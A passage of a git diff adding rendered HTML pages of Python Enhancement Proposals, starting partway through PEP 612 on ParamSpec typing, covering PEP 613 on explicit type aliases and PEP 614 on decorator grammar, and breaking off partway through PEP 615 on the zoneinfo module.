    • This special case is necessary to encapsulate the heterogeneous contents +of the args/kwargs of a given call, which cannot be expressed +by an indefinite tuple/dictionary type.
    • +
    +
  • +
  • A function of type Callable[P, R] can be called with (*args, **kwargs) +if and only if args has the type P.args and kwargs has the type +P.kwargs, and that those types both originated from the same function +declaration.
  • +
  • A function declared as def inner(*args: P.args, **kwargs: P.kwargs) -> X +has type Callable[P, X].
  • +
+

With these three properties, we now have the ability to fully type check +parameter preserving decorators.

+
def decorator(f: Callable[P, int]) -> Callable[P, None]:
+
+  def foo(*args: P.args, **kwargs: P.kwargs) -> None:
+
+    f(*args, **kwargs)    # Accepted, should resolve to int
+
+    f(*kwargs, **args)    # Rejected
+
+    f(1, *args, **kwargs) # Rejected
+
+  return foo              # Accepted
+
+
+

To extend this to include Concatenate, we declare the following properties:

+
    +
  • A function of type Callable[Concatenate[A, B, P], R] can only be +called with (a, b, *args, **kwargs) when args and kwargs are the +respective components of P, a is of type A and b is of +type B.
  • +
  • A function declared as +def inner(a: A, b: B, *args: P.args, **kwargs: P.kwargs) -> R +has type Callable[Concatenate[A, B, P], R]. Placing keyword-only +parameters between the *args and **kwargs is forbidden.
  • +
+
def add(f: Callable[P, int]) -> Callable[Concatenate[str, P], None]:
+
+  def foo(s: str, *args: P.args, **kwargs: P.kwargs) -> None:  # Accepted
+    pass
+
+  def bar(*args: P.args, s: str, **kwargs: P.kwargs) -> None:  # Rejected
+    pass
+
+  return foo                                                   # Accepted
+
+
+def remove(f: Callable[Concatenate[int, P], int]) -> Callable[P, None]:
+
+  def foo(*args: P.args, **kwargs: P.kwargs) -> None:
+    f(1, *args, **kwargs) # Accepted
+
+    f(*args, 1, **kwargs) # Rejected
+
+    f(*args, **kwargs)    # Rejected
+
+  return foo
+
+
+

Note that the names of the parameters preceding the ParamSpec +components are not mentioned in the resulting Concatenate. This means that +these parameters can not be addressed via a named argument:

+
def outer(f: Callable[P, None]) -> Callable[P, None]:
+  def foo(x: int, *args: P.args, **kwargs: P.kwargs) -> None:
+    f(*args, **kwargs)
+
+  def bar(*args: P.args, **kwargs: P.kwargs) -> None:
+    foo(1, *args, **kwargs)   # Accepted
+    foo(x=1, *args, **kwargs) # Rejected
+
+  return bar
+
+
+

This is not an implementation convenience, but a soundness requirement. If we +were to allow that second calling style, then the following snippet would be +problematic.

+
@outer
+def problem(*, x: object) -> None:
+  pass
+
+problem(x="uh-oh")
+
+
+

Inside of bar, we would get +TypeError: foo() got multiple values for argument 'x'. Requiring these +concatenated arguments to be addressed positionally avoids this kind of problem, +and simplifies the syntax for spelling these types. Note that this also why we +have to reject signatures of the form +(*args: P.args, s: str, **kwargs: P.kwargs) (See +Concatenating Keyword Parameters for more details).

+

If one of these prepended positional parameters contains a free ParamSpec, +we consider that variable in scope for the purposes of extracting the components +of that ParamSpec. That allows us to spell things like this:

+
def twice(f: Callable[P, int], *args: P.args, **kwargs: P.kwargs) -> int:
+  return f(*args, **kwargs) + f(*args, **kwargs)
+
+
+

The type of twice in the above example is +Callable[Concatenate[Callable[P, int], P], int], where P is bound by the +outer Callable. This has the following semantics:

+
def a_int_b_str(a: int, b: str) -> int:
+  pass
+
+twice(a_int_b_str, 1, "A")       # Accepted
+
+twice(a_int_b_str, b="A", a=1)   # Accepted
+
+twice(a_int_b_str, "A", 1)       # Rejected
+
+
+
+
+
+
+

Backwards Compatibility

+

The only changes necessary to existing features in typing is allowing these +ParamSpec and Concatenate objects to be the first parameter to +Callable and to be a parameter to Generic. Currently Callable +expects a list of types there and Generic expects single types, so they are +currently mutually exclusive. Otherwise, existing code that doesn’t reference +the new interfaces will be unaffected.

+
+
+

Reference Implementation

+

The Pyre type checker supports all of the behavior +described above. A reference implementation of the runtime components needed +for those uses is provided in the pyre_extensions module. A reference +implementation for CPython can be found +here.

+
+
+

Rejected Alternatives

+
+

Using List Variadics and Map Variadics

+

We considered just trying to make something like this with a callback protocol +which was parameterized on a list-type variadic, and a map-type variadic like +so:

+
R = typing.TypeVar(“R”)
+Tpositionals = ...
+Tkeywords = ...
+class BetterCallable(typing.Protocol[Tpositionals, Tkeywords, R]):
+  def __call__(*args: Tpositionals, **kwargs: Tkeywords) -> R: ...
+
+
+

However, there are some problems with trying to come up with a consistent +solution for those type variables for a given callable. This problem comes up +with even the simplest of callables:

+
def simple(x: int) -> None: ...
+simple <: BetterCallable[[int], [], None]
+simple <: BetterCallable[[], {“x”: int}, None]
+BetterCallable[[int], [], None] </: BetterCallable[[], {“x”: int}, None]
+
+
+

Any time where a type can implement a protocol in more than one way that aren’t +mutually compatible, we can run into situations where we lose information. If we +were to make a decorator using this protocol, we would have to pick one calling +convention to prefer.

+
def decorator(
+  f: BetterCallable[[Ts], [Tmap], int],
+) -> BetterCallable[[Ts], [Tmap], str]:
+  def decorated(*args: Ts, **kwargs: Tmap) -> str:
+    x = f(*args, **kwargs)
+    return int_to_str(x)
+  return decorated
+
+@decorator
+def foo(x: int) -> int:
+  return x
+
+reveal_type(foo) # Option A: BetterCallable[[int], {}, str]
+                 # Option B: BetterCallable[[], {x: int}, str]
+foo(7)   # fails under option B
+foo(x=7) # fails under option A
+
+
+

The core problem here is that, by default, parameters in Python can either be +called positionally or as a keyword argument. This means we really have +three categories (positional-only, positional-or-keyword, keyword-only) we’re +trying to jam into two categories. This is the same problem that we briefly +mentioned when discussing .args and .kwargs. Fundamentally, in order to +capture two categories when there are some things that can be in either +category, we need a higher level primitive (ParamSpec) to +capture all three, and then split them out afterward.

+
+
+

Defining ParametersOf

+

Another proposal we considered was defining ParametersOf and ReturnType +operators which would operate on a domain of a newly defined Function type. +Function would be callable with, and only with ParametersOf[F]. +ParametersOf and ReturnType would only operate on type variables with +precisely this bound. The combination of these three features could express +everything that we can express with ParamSpecs.

+
F = TypeVar("F", bound=Function)
+
+def no_change(f: F) -> F:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> ReturnType[F]:
+    return f(*args, **kwargs)
+  return inner
+
+def wrapping(f: F) -> Callable[ParametersOf[F], List[ReturnType[F]]]:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> List[ReturnType[F]]:
+    return [f(*args, **kwargs)]
+  return inner
+
+def unwrapping(
+  f: Callable[ParametersOf[F], List[R]]
+) -> Callable[ParametersOf[F], R]:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> R:
+    return f(*args, **kwargs)[0]
+  return inner
+
+
+

We decided to go with ParamSpecs over this approach for several reasons:

+
    +
  • The footprint of this change would be larger, as we would need two new +operators, and a new type, while ParamSpec just introduces a new variable.
  • +
  • Python typing has so far has avoided supporting operators, whether +user-defined or built-in, in favor of destructuring. Accordingly, +ParamSpec based signatures look much more like existing Python.
  • +
  • The lack of user-defined operators makes common patterns hard to spell. +unwrapping is odd to read because F is not actually referring to any +callable. It’s just being used as a container for the parameters we wish to +propagate. It would read better if we could define an operator +RemoveList[List[X]] = X and then unwrapping could take F and +return Callable[ParametersOf[F], RemoveList[ReturnType[F]]]. Without +that, we unfortunately get into a situation where we have to use a +Function-variable as an improvised ParamSpec, in that we never +actually bind the return type.
  • +
+

In summary, between these two equivalently powerful syntaxes, ParamSpec fits +much more naturally into the status quo.

+
+
+

Concatenating Keyword Parameters

+

In principle the idea of concatenation as a means to modify a finite number of +positional parameters could be expanded to include keyword parameters.

+
def add_n(f: Callable[P, R]) -> Callable[Concatenate[("n", int), P], R]:
+  def inner(*args: P.args, n: int, **kwargs: P.kwargs) -> R:
+    # use n
+    return f(*args, **kwargs)
+  return inner
+
+
+

However, the key distinction is that while prepending positional-only parameters +to a valid callable type always yields another valid callable type, the same +cannot be said for adding keyword-only parameters. As alluded to above , the +issue is name collisions. The parameters Concatenate[("n", int), P] are +only valid when P itself does not already have a parameter named n.

+
def innocent_wrapper(f: Callable[P, R]) -> Callable[P, R]:
+  def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    added = add_n(f)
+    return added(*args, n=1, **kwargs)
+  return inner
+
+@innocent_wrapper
+def problem(n: int) -> None:
+  pass
+
+
+

Calling problem(2) works fine, but calling problem(n=2) leads to a +TypeError: problem() got multiple values for argument 'n' from the call to +added inside of innocent_wrapper.

+

This kind of situation could be avoided, and this kind of decorator could be +typed if we could reify the constraint that a set of parameters not contain +a certain name, with something like:

+
P_without_n = ParamSpec("P_without_n", banned_names=["n"])
+
+def add_n(
+  f: Callable[P_without_n, R]
+) -> Callable[Concatenate[("n", int), P_without_n], R]: ...
+
+
+

The call to add_n inside of innocent_wrapper could then be rejected +since the callable was not guaranteed not to already have a parameter named +n.

+

However, enforcing these constraints would require enough additional +implementation work that we judged this extension to be out of scope of this +PEP. Fortunately the design of ParamSpecs are such that we can return to +this idea later if there is sufficient demand.

+
+
+

Naming this a ParameterSpecification

+

We decided that ParameterSpecification was a little too long-winded for use +here, and that this style of abbreviated name made it look more like TypeVar.

+
+
+

Naming this an ArgSpec

+

We think that calling this a ParamSpec is more correct than +referring to it as an ArgSpec, since callables have parameters, +which are distinct from the arguments which are passed to them in a given call +site. A given binding for a ParamSpec is a set of function +parameters, not a call-site’s arguments.

+
+
+
+

Acknowledgements

+

Thanks to all of the members of the Pyre team for their comments on early drafts +of this PEP, and for their help with the reference implementation.

+

Thanks are also due to the whole Python typing community for their early +feedback on this idea at a Python typing meetup, leading directly to the much +more compact .args/.kwargs syntax.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0612.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0613/index.html b/pep-0613/index.html new file mode 100644 index 00000000000..5b5245e503a --- /dev/null +++ b/pep-0613/index.html @@ -0,0 +1,335 @@ + + + + + + + + PEP 613 – Explicit Type Aliases | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 613 – Explicit Type Aliases

+
+
Author:
+
Shannon Zhu <szhu at fb.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
21-Jan-2020
+
Python-Version:
+
3.10
+
Post-History:
+
21-Jan-2020
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Type aliases and +typing.TypeAlias for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Type aliases are user-specified types which may be as complex as any type hint, +and are specified with a simple variable assignment on a module top level.

+

This PEP formalizes a way to explicitly declare an assignment as a type alias.

+
+
+

Motivation

+

Type aliases are declared as top level variable assignments. +In PEP 484, +the distinction between a valid type alias and a global variable was implicitly +determined: if a top level assignment is unannotated, and the assigned value is +a valid type, then the name being assigned to is a valid type alias. Otherwise, +that name is simply a global value that cannot be used as a type hint.

+

These implicit type alias declaration rules create confusion when type aliases +involve forward references, invalid types, or violate other restrictions +enforced on type alias declaration. Because the distinction between an +unannotated value and a type alias is implicit, ambiguous or incorrect type +alias declarations implicitly default to a valid value assignment. This creates +expressions that are impossible to express as type aliases and punts error +diagnosis of malformed type aliases downstream.

+

The following examples each include an illustration of some of the suboptimal +or confusing behaviors resulting from existing implicit alias declarations. +We also introduce explicit aliases of the format TypeName: TypeAlias = Expression +here for the sake of comparison, but the syntax is discussed in further detail +in later sections.

+
+

Forward References:

+
MyType = "ClassName"
+def foo() -> MyType: ...
+
+
+

This code snippet should not error so long as ClassName is defined +later on. However, a type checker is forced to assume that MyType is a value +assignment rather than a type alias, and therefore may throw spurious errors +that (1) MyType is an unannotated global string, and (2) MyType +cannot be used as a return annotation because it is not a valid type.

+
MyType: TypeAlias = "ClassName"
+def foo() -> MyType: ...
+
+
+

Explicit aliases remove ambiguity so neither of the above errors will be +thrown. Additionally, if something is wrong with ClassName +(i.e., it’s not actually defined later), the type checker can throw an error.

+
+
+

Error Messaging:

+
MyType1 = InvalidType
+MyType2 = MyGeneric(int)  # i.e., intention was MyGeneric[int]
+
+
+

A type checker should warn on this code snippet that InvalidType is not +a valid type, and therefore cannot be used to annotate an expression or to +construct a type alias. Instead, type checkers are forced to throw spurious +errors that (1) MyType is a global expression missing an annotation, +and (2) MyType is not a valid type in all usages of MyType +across the codebase.

+
MyType1: TypeAlias = InvalidType
+MyType2: TypeAlias = MyGeneric(int)
+
+
+

With explicit aliases, the type checker has enough information to error on the +actual definition of the bad type alias, and explain why: that MyGeneric(int) +and InvalidType are not valid types. When the value expression is no longer +evaluated as a global value, unactionable type errors on all usages of MyType +across the codebase can be suppressed.

+
+
+

Scope Restrictions:

+
class Foo:
+  x = ClassName
+  y: TypeAlias = ClassName
+  z: Type[ClassName] = ClassName
+
+
+

Type aliases are valid within class scope, both implicitly (x) and +explicitly (y). If the line should be interpreted as a class +variable, it must be explicitly annotated (z).

+
x = ClassName
+def foo() -> None:
+  x = ClassName
+
+
+

The outer x is a valid type alias, but type checkers must error if the +inner x is ever used as a type because type aliases cannot be defined +inside of a function. +This is confusing because the alias declaration rule is not explicit, and because +a type error will not be thrown on the location of the inner type alias declaration +but rather on every one of its subsequent use cases.

+
x: TypeAlias = ClassName
+def foo() -> None:
+  x = ClassName
+def bar() -> None:
+  x: TypeAlias = ClassName
+
+
+

With explicit aliases, the outer assignment is still a valid type variable. +Inside foo, the inner assignment should be interpreted as x: Type[ClassName]. +Inside bar, the type checker should raise a clear error, communicating +to the author that type aliases cannot be defined inside a function.

+
+
+
+

Specification

+

The explicit alias declaration syntax clearly differentiates between the three +possible kinds of assignments: typed global expressions, untyped global +expressions, and type aliases. This avoids the existence of assignments that +break type checking when an annotation is added, and avoids classifying the +nature of the assignment based on the type of the value.

+

Implicit syntax (pre-existing):

+
x = 1  # untyped global expression
+x: int = 1  # typed global expression
+
+x = int  # type alias
+x: Type[int] = int  # typed global expression
+
+
+

Explicit syntax:

+
x = 1  # untyped global expression
+x: int = 1  # typed global expression
+
+x = int  # untyped global expression (see note below)
+x: Type[int] = int  # typed global expression
+
+x: TypeAlias = int  # type alias
+x: TypeAlias = "MyClass"  # type alias
+
+
+

Note: The examples above illustrate implicit and explicit alias declarations in +isolation. For the sake of backwards compatibility, type checkers should support +both simultaneously, meaning an untyped global expression x = int will +still be considered a valid type alias.

+
+
+

Backwards Compatibility

+

Explicit aliases provide an alternative way to declare type aliases, but all +pre-existing code and old alias declarations will work as before.

+
+
+

Reference Implementation

+

The Pyre type checker supports explicit type +alias declarations.

+
+
+

Rejected Ideas

+

Some alternative syntaxes were considered for explicit aliases:

+
MyType: TypeAlias[int]
+
+
+

This looks a lot like an uninitialized variable.

+
MyType = TypeAlias[int]
+
+
+

Along with the option above, this format potentially adds confusion around +what the runtime value of MyType is.

+

In comparison, the chosen syntax option MyType: TypeAlias = int is +appealing because it still sticks with the MyType = int assignment +syntax, and adds some information for the type checker purely as an annotation.

+
+
+

Version History

+
    +
  • 2021-11-16
      +
    • Allow TypeAlias inside class scope
    • +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0613.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0614/index.html b/pep-0614/index.html new file mode 100644 index 00000000000..2f6e298e833 --- /dev/null +++ b/pep-0614/index.html @@ -0,0 +1,326 @@ + + + + + + + + PEP 614 – Relaxing Grammar Restrictions On Decorators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 614 – Relaxing Grammar Restrictions On Decorators

+
+
Author:
+
Brandt Bucher <brandt at python.org>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2020
+
Python-Version:
+
3.9
+
Post-History:
+
11-Feb-2020, 18-Feb-2020, 03-Mar-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python currently requires that all decorators consist of a dotted +name, optionally followed by a single call. This PEP proposes removing +these limitations and allowing decorators to be any valid expression.

+
+
+

Motivation

+

When decorators were first being introduced, Guido described +the motivation to limit their syntax as a preference, not a technical +requirement:

+
+
I have a gut feeling about this one. I’m not sure where it comes +from, but I have it… So while it would be quite easy to change +the syntax to @test in the future, I’d like to stick to with +the more restricted form unless a real use case is presented where +allowing @test would increase readability.
+

While these limitations were rarely encountered in practice, BPO +issues and mailing list posts +have consistently surfaced over the years requesting that they be +removed. The most recent one +(which prompted this proposal) +contained a good example of code using the PyQt5 library that +would become more readable, idiomatic, and maintainable if the +existing restrictions were relaxed. Slightly modified:

+
buttons = [QPushButton(f'Button {i}') for i in range(10)]
+
+# Do stuff with the list of buttons...
+
+@buttons[0].clicked.connect
+def spam():
+    ...
+
+@buttons[1].clicked.connect
+def eggs():
+    ...
+
+# Do stuff with the list of buttons...
+
+
+

Currently, these decorations must be rewritten as something like:

+
button_0 = buttons[0]
+
+@button_0.clicked.connect
+def spam():
+    ...
+
+button_1 = buttons[1]
+
+@button_1.clicked.connect
+def eggs():
+    ...
+
+
+

Further, the current grammar is already loose enough that it’s trivial +to hack more complicated decorator expressions together. So rather +than disallow arbitrarily complex expressions, as intended, the +current restrictions only make them uglier and less efficient:

+
# Identity function hack:
+
+def _(x):
+    return x
+
+@_(buttons[0].clicked.connect)
+def spam():
+    ...
+
+# eval hack:
+
+@eval("buttons[1].clicked.connect")
+def eggs():
+    ...
+
+
+
+
+

Rationale

+
+

Allowing Any Expression

+

The decision to allow any valid expression (and not just relaxing +the current restrictions to allow, for example, subscripting) has +been considered as the next logical step in the evolution of decorator +grammar for quite some time. As Guido noted, +during yet another mailing list thread:

+
+
I don’t think it’s reasonable to constrain it less than it +currently is but more than a general expression.
+

Special-casing the grammar to allow some useful cases would only +complicate the current situation, and all but guarantee that the +process would repeat itself sometime in the future. Further, one +purpose of this grammatical change is to discourage the temptation to +use hacks like the eval and identity-function anti-patterns shown +above.

+

In short: if we’re removing somewhat arbitrary restrictions, we should +remove all of them.

+
+
+

What Counts As An “Expression”

+

Throughout this document, the word “expression” is used as defined in +the Python Language Reference. +This can be summarized as “anything that’s valid as a test in if, +elif, and while blocks”. This differs subtly from a perhaps +more popular definition, which can +be summarized as “anything that’s valid as string input to eval”.

+

This definition of “expression” is convenient in that it fits our +needs well, and reuses the allowed grammar of existing language +constructs. It has two subtle differences from the other definition:

+
+

Tuple Displays Must Be Parenthesized

+

This is based on an observation Guido made in the same email. +Continued immediately from above:

+
+
Though I wouldn’t allow commas– there’s no way that
@f, g
+def pooh(): ...
+
+
+

can make sense.

+
+

Indeed, it may even lead inexperienced readers to conclude that +several decorators are being applied, as if they were stacked. +Requiring parentheses here makes the (admittedly nonsensical) intent +clear without imposing further restrictions and grammar complications.

+
+
+

Named Expressions Need Not Be Parenthesized

+

Here, the choice of syntax is unambiguous. PEP 572 explains +why it requires parentheses around top-level expression statements:

+
+
This rule is included to simplify the choice for the user between +an assignment statement and an assignment expression – there is +no syntactic position where both are valid.
+

Since an assignment statement is not valid here, assignment +expressions should not be unnecessarily burdened with parentheses.

+
+
+
+
+

Specification

+

The grammar for decorators is currently:

+
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
+
+
+

This PEP proposes that it be simplified to:

+
decorator: '@' namedexpr_test NEWLINE
+
+
+
+
+

Backwards Compatibility

+

This new grammar is fully backward-compatible with the existing +grammar.

+
+
+

How To Teach This

+

Decorators can continue to be taught as they always have; the average +Python programmer is likely unaware that the current restriction even +exists.

+
+
+

Reference Implementation

+

The author has written a CPython implementation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0614.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0615/index.html b/pep-0615/index.html new file mode 100644 index 00000000000..f1e363f2884 --- /dev/null +++ b/pep-0615/index.html @@ -0,0 +1,1058 @@ + + + + + + + + PEP 615 – Support for the IANA Time Zone Database in the Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 615 – Support for the IANA Time Zone Database in the Standard Library

+
+
Author:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2020
+
Python-Version:
+
3.9
+
Post-History:
+
25-Feb-2020, 29-Mar-2020
+
Replaces:
+
431
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at zoneinfo.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This proposes adding a module, zoneinfo, to provide a concrete time zone +implementation supporting the IANA time zone database. By default, +zoneinfo will use the system’s time zone data if available; if no system +time zone data is available, the library will fall back to using the +first-party package tzdata, deployed on PyPI. [d]

+
+
+

Motivation

+

The datetime library uses a flexible mechanism to handle time zones: all +conversions and time zone information queries are delegated to an instance of a +subclass of the abstract datetime.tzinfo base class. [10] This allows +users to implement arbitrarily complex time zone rules, but in practice the +majority of users want support for just three types of time zone: [a]

+
    +
  1. UTC and fixed offsets thereof
  2. +
  3. The system local time zone
  4. +
  5. IANA time zones
  6. +
+

In Python 3.2, the datetime.timezone class was introduced to support the +first class of time zone (with a special datetime.timezone.utc singleton +for UTC).

+

While there is still no “local” time zone, in Python 3.0 the semantics of naïve +time zones was changed to support many “local time” operations, and it is now +possible to get a fixed time zone offset from a local time:

+
>>> print(datetime(2020, 2, 22, 12, 0).astimezone())
+2020-02-22 12:00:00-05:00
+>>> print(datetime(2020, 2, 22, 12, 0).astimezone()
+...       .strftime("%Y-%m-%d %H:%M:%S %Z"))
+2020-02-22 12:00:00 EST
+>>> print(datetime(2020, 2, 22, 12, 0).astimezone(timezone.utc))
+2020-02-22 17:00:00+00:00
+
+
+

However, there is still no support for the time zones described in the IANA +time zone database (also called the “tz” database or the Olson database +[6]). The time zone database is in the public domain and is widely +distributed — it is present by default on many Unix-like operating systems. +Great care goes into the stability of the database: there are IETF RFCs both +for the maintenance procedures (RFC 6557) and for the compiled +binary (TZif) format (RFC 8536). As such, it is likely that adding +support for the compiled outputs of the IANA database will add great value to +end users even with the relatively long cadence of standard library releases.

+
+
+

Proposal

+

This PEP has three main concerns:

+
    +
  1. The semantics of the zoneinfo.ZoneInfo class (zoneinfo-class)
  2. +
  3. Time zone data sources used (data-sources)
  4. +
  5. Options for configuration of the time zone search path (search-path-config)
  6. +
+

Because of the complexity of the proposal, rather than having separate +“specification” and “rationale” sections the design decisions and rationales +are grouped together by subject.

+
+

The zoneinfo.ZoneInfo class

+
+

Constructors

+

The initial design of the zoneinfo.ZoneInfo class has several constructors.

+
ZoneInfo(key: str)
+
+
+

The primary constructor takes a single argument, key, which is a string +indicating the name of a zone file in the system time zone database (e.g. +"America/New_York", "Europe/London"), and returns a ZoneInfo +constructed from the first matching data source on search path (see the +data-sources section for more details). All zone information must be eagerly +read from the data source (usually a TZif file) upon construction, and may +not change during the lifetime of the object (this restriction applies to all +ZoneInfo constructors).

+

In the event that no matching file is found on the search path (either because +the system does not supply time zone data or because the key is invalid), the +constructor will raise a zoneinfo.ZoneInfoNotFoundError, which will be a +subclass of KeyError.

+

One somewhat unusual guarantee made by this constructor is that calls with +identical arguments must return identical objects. Specifically, for all +values of key, the following assertion must always be valid [b]:

+
a = ZoneInfo(key)
+b = ZoneInfo(key)
+assert a is b
+
+
+

The reason for this comes from the fact that the semantics of datetime +operations (e.g. comparison, arithmetic) depend on whether the datetimes +involved represent the same or different zones; two datetimes are in the same +zone only if dt1.tzinfo is dt2.tzinfo. [1] In addition +to the modest performance benefit from avoiding unnecessary proliferation of +ZoneInfo objects, providing this guarantee should minimize surprising +behavior for end users.

+

dateutil.tz.gettz has provided a similar guarantee since version 2.7.0 +(release March 2018). [16]

+
+

Note

+

The implementation may decide how to implement the cache behavior, but the +guarantee made here only requires that as long as two references exist to +the result of identical constructor calls, they must be references to the +same object. This is consistent with a reference counted cache where +ZoneInfo objects are ejected when no references to them exist (for +example, a cache implemented with a weakref.WeakValueDictionary) — it is +allowed but not required or recommended to implement this with a “strong” +cache, where all ZoneInfo objects are kept alive indefinitely.

+
+
ZoneInfo.no_cache(key: str)
+
+
+

This is an alternate constructor that bypasses the constructor’s cache. It is +identical to the primary constructor, but returns a new object on each call. +This is likely most useful for testing purposes, or to deliberately induce +“different zone” semantics between datetimes with the same nominal time zone.

+

Even if an object constructed by this method would have been a cache miss, it +must not be entered into the cache; in other words, the following assertion +should always be true:

+
>>> a = ZoneInfo.no_cache(key)
+>>> b = ZoneInfo(key)
+>>> a is not b
+
+
+
ZoneInfo.from_file(fobj: IO[bytes], /, key: str = None)
+
+
+

This is an alternate constructor that allows the construction of a ZoneInfo +object from any TZif byte stream. This constructor takes an optional +parameter, key, which sets the name of the zone, for the purposes of +__str__ and __repr__ (see Representations).

+

Unlike the primary constructor, this always constructs a new object. There are +two reasons that this deviates from the primary constructor’s caching behavior: +stream objects have mutable state and so determining whether two inputs are +identical is difficult or impossible, and it is likely that users constructing +from a file specifically want to load from that file and not a cache.

+

As with ZoneInfo.no_cache, objects constructed by this method must not be +added to the cache.

+
+
+

Behavior during data updates

+

It is important that a given ZoneInfo object’s behavior not change during +its lifetime, because a datetime’s utcoffset() method is used in both +its equality and hash calculations, and if the result were to change during the +datetime’s lifetime, it could break the invariant for all hashable objects +[3] [4] that if x == y, it must also be true +that hash(x) == hash(y) [c] .

+

Considering both the preservation of datetime’s invariants and the +primary constructor’s contract to always return the same object when called +with identical arguments, if a source of time zone data is updated during a run +of the interpreter, it must not invalidate any caches or modify any +existing ZoneInfo objects. Newly constructed ZoneInfo objects, however, +should come from the updated data source.

+

This means that the point at which the data source is updated for new +invocations of the ZoneInfo constructor depends primarily on the semantics +of the caching behavior. The only guaranteed way to get a ZoneInfo object +from an updated data source is to induce a cache miss, either by bypassing the +cache and using ZoneInfo.no_cache or by clearing the cache.

+
+

Note

+

The specified cache behavior does not require that the cache be lazily +populated — it is consistent with the specification (though not +recommended) to eagerly pre-populate the cache with time zones that have +never been constructed.

+
+
+
+

Deliberate cache invalidation

+

In addition to ZoneInfo.no_cache, which allows a user to bypass the +cache, ZoneInfo also exposes a clear_cache method to deliberately +invalidate either the entire cache or selective portions of the cache:

+
ZoneInfo.clear_cache(*, only_keys: Iterable[str]=None) -> None
+
+
+

If no arguments are passed, all caches are invalidated and the first call for +each key to the primary ZoneInfo constructor after the cache has been +cleared will return a new instance.

+
>>> NYC0 = ZoneInfo("America/New_York")
+>>> NYC0 is ZoneInfo("America/New_York")
+True
+>>> ZoneInfo.clear_cache()
+>>> NYC1 = ZoneInfo("America/New_York")
+>>> NYC0 is NYC1
+False
+>>> NYC1 is ZoneInfo("America/New_York")
+True
+
+
+

An optional parameter, only_keys, takes an iterable of keys to clear from +the cache, otherwise leaving the cache intact.

+
>>> NYC0 = ZoneInfo("America/New_York")
+>>> LA0 = ZoneInfo("America/Los_Angeles")
+>>> ZoneInfo.clear_cache(only_keys=["America/New_York"])
+>>> NYC1 = ZoneInfo("America/New_York")
+>>> LA0 = ZoneInfo("America/Los_Angeles")
+>>> NYC0 is NYC1
+False
+>>> LA0 is LA1
+True
+
+
+

Manipulation of the cache behavior is expected to be a niche use case; this +function is primarily provided to facilitate testing, and to allow users with +unusual requirements to tune the cache invalidation behavior to their needs.

+
+
+

String representation

+

The ZoneInfo class’s __str__ representation will be drawn from the +key parameter. This is partially because the key represents a +human-readable “name” of the string, but also because it is a useful parameter +that users will want exposed. It is necessary to provide a mechanism to expose +the key for serialization between languages and because it is also a primary +key for localization projects like CLDR (the Unicode Common Locale Data +Repository [5]).

+

An example:

+
>>> zone = ZoneInfo("Pacific/Kwajalein")
+>>> str(zone)
+'Pacific/Kwajalein'
+
+>>> dt = datetime(2020, 4, 1, 3, 15, tzinfo=zone)
+>>> f"{dt.isoformat()} [{dt.tzinfo}]"
+'2020-04-01T03:15:00+12:00 [Pacific/Kwajalein]'
+
+
+

When a key is not specified, the str operation should not fail, but +should return the objects’s __repr__:

+
>>> zone = ZoneInfo.from_file(f)
+>>> str(zone)
+'ZoneInfo.from_file(<_io.BytesIO object at ...>)'
+
+
+

The __repr__ for a ZoneInfo is implementation-defined and not +necessarily stable between versions, but it must not be a valid ZoneInfo +key, to avoid confusion between a key-derived ZoneInfo with a valid +__str__ and a file-derived ZoneInfo which has fallen through to the +__repr__.

+

Since the use of str() to access the key provides no easy way to check +for the presence of a key (the only way is to try constructing a ZoneInfo +from it and detect whether it raises an exception), ZoneInfo objects will +also expose a read-only key attribute, which will be None in the event +that no key was supplied.

+
+
+

Pickle serialization

+

Rather than serializing all transition data, ZoneInfo objects will be +serialized by key, and ZoneInfo objects constructed from raw files (even +those with a value for key specified) cannot be pickled.

+

The behavior of a ZoneInfo object depends on how it was constructed:

+
    +
